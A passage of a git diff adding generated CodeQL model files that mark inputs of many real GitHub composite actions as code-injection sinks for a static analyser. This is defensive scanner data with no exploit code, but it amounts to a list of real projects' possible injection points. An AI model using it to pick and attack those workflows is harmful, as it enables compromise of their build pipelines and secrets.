["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] + - ["cilium/cilium", "*", "input.lb-acceleration", "code-injection", "generated"] + - ["cilium/cilium", "*", "input.mutual-auth", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/actions/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml new file mode 100644 index 000000000000..ecfd41e15dc8 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] + - ["citusdata/citus", "*", "input.pg_major", "code-injection", "generated"] + - ["citusdata/citus", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/actions/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml new file mode 100644 index 000000000000..b334b14eb37d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.auth-password", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.auth-user", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.registry", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.publish-cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/actions/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml new file mode 100644 index 000000000000..936a44a214ba --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "input.bucket-url", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "input.docs-dir", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml new file mode 100644 index 000000000000..c116f45a7dfe --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/actions/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml new file mode 100644 index 000000000000..f8438e902c6e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/actions/ql/lib/ext/generated/composite-actions/coder_coder.model.yml new file mode 100644 index 000000000000..dc392c76263d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/actions/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml new file mode 100644 index 000000000000..0e7876a64fe4 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/actions/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml new file mode 100644 index 000000000000..ccad63033af8 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] + - ["commaai/openpilot", "*", "input.docker_hub_pat", "code-injection", "generated"] + - ["commaai/openpilot", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/actions/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml new file mode 100644 index 000000000000..138ced8ab043 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] + - ["conan-io/conan-center-index", "*", "input.reviewers", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/actions/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml new file mode 100644 index 000000000000..20493280565c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "input.upstream", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "input.merge-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "input.local-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml new file mode 100644 index 000000000000..a0d3adcc3d2b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/actions/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml new file mode 100644 index 000000000000..7db33e6e72c3 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/actions/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml new file mode 100644 index 000000000000..c4fca4427eca --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/actions/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml new file mode 100644 index 000000000000..09d2beb89470 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.macos-target", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.check-examples", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.check-python-bindings", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.check-install", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.regressions-exclude", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.strip-bin", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.configure-config", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.configure-env", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/actions/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml new file mode 100644 index 000000000000..bd5de74fa09d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "input.work-dir", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "input.job-name", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "input.job-type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml new file mode 100644 index 000000000000..5b46de73fc27 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.deploy-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.wait-between-retries", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.retries-on-failure", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.check-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.build-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.pre-build-command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml new file mode 100644 index 000000000000..970fd7bc1f13 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.baseImage", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.aas_github_token", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.artifacts_path", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml new file mode 100644 index 000000000000..af46895fa51f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "input.tags", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "input.service", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "input.dd-api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml new file mode 100644 index 000000000000..98ef93128eb3 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] + - ["datadog/dd-trace-js", "*", "input.init-image-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/actions/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml new file mode 100644 index 000000000000..8d4820efeb70 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] + - ["datafuselabs/databend", "*", "input.dirs", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/actions/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml new file mode 100644 index 000000000000..44f0c6dce8f8 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] + - ["davatorium/rofi", "*", "input.windowmode", "code-injection", "generated"] + - ["davatorium/rofi", "*", "input.cc", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/actions/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml new file mode 100644 index 000000000000..d874137e497a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/actions/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml new file mode 100644 index 000000000000..2ec8442b1cf7 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/actions/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml new file mode 100644 index 000000000000..046bb764a1d6 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/actions/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml new file mode 100644 index 000000000000..dcd8a2df02c0 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/actions/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml new file mode 100644 index 000000000000..238d675e5b7f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "input.result", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/actions/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml new file mode 100644 index 000000000000..c6f83e458bde --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] + - ["diggerhq/digger", "*", "input.google-auth-credentials", "code-injection", "generated"] + - ["diggerhq/digger", "*", "input.google-workload-identity-provider", "code-injection", "generated"] + - ["diggerhq/digger", "*", "input.google-service-account", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/actions/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml new file mode 100644 index 000000000000..8a10734bd645 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] + - ["diku-dk/futhark", "*", "input.slurm-options", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/actions/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml new file mode 100644 index 000000000000..770554c8b9df --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/actions/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml new file mode 100644 index 000000000000..fb0631e0bbbb --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "input.filename", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/actions/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml new file mode 100644 index 000000000000..caf896bbac3d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/actions/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml new file mode 100644 index 000000000000..02917d6da30e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/actions/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml new file mode 100644 index 000000000000..17bea3155c5a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/actions/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml new file mode 100644 index 000000000000..64ff68f38ad1 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "input.filter", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "input.dfly-executable", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "input.build-folder-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/actions/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml new file mode 100644 index 000000000000..c6bdede140fd --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] + - ["drawpile/drawpile", "*", "input.path", "output.path", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/actions/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml new file mode 100644 index 000000000000..7909d6177768 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "input.email", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml new file mode 100644 index 000000000000..c62ee58c4402 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] + - ["elastic/apm-agent-dotnet", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml new file mode 100644 index 000000000000..37efd3a4d40b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.path", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.name", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.test-java-version", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/actions/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml new file mode 100644 index 000000000000..0a84e79d0243 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] + - ["elastic/apm-server", "*", "input.version", "output.release-branch", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/actions/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml new file mode 100644 index 000000000000..a026f0529340 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.CHANNEL", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.PACKAGE_VERSION", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.MESSAGE", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.SLACK_TOKEN", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.SLACK_CHANNELS", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.PRERELEASE", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.TAG_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/actions/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml new file mode 100644 index 000000000000..9b199fb5973c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/actions/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml new file mode 100644 index 000000000000..13ae8d0f718e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] + - ["emqx/emqx", "*", "input.otp", "code-injection", "generated"] + - ["emqx/emqx", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/actions/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml new file mode 100644 index 000000000000..04775e835715 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] + - ["eonasdan/tempus-dominus", "*", "input.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/actions/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml new file mode 100644 index 000000000000..b0b5918d13fe --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] + - ["erlang/otp", "*", "input.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/actions/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml new file mode 100644 index 000000000000..9879b7e44517 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] + - ["esphome/esphome", "*", "input.suffix", "code-injection", "generated"] + - ["esphome/esphome", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/actions/ql/lib/ext/generated/composite-actions/expensify_app.model.yml new file mode 100644 index 000000000000..e38a5edef48f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] + - ["expensify/app", "*", "input.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_PASSWORD_EMAIL", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_USER_SECRET", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_USER_ID", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_PASSWORD", "code-injection", "generated"] + - ["expensify/app", "*", "input.PATH_ENV_FILE", "code-injection", "generated"] + - ["expensify/app", "*", 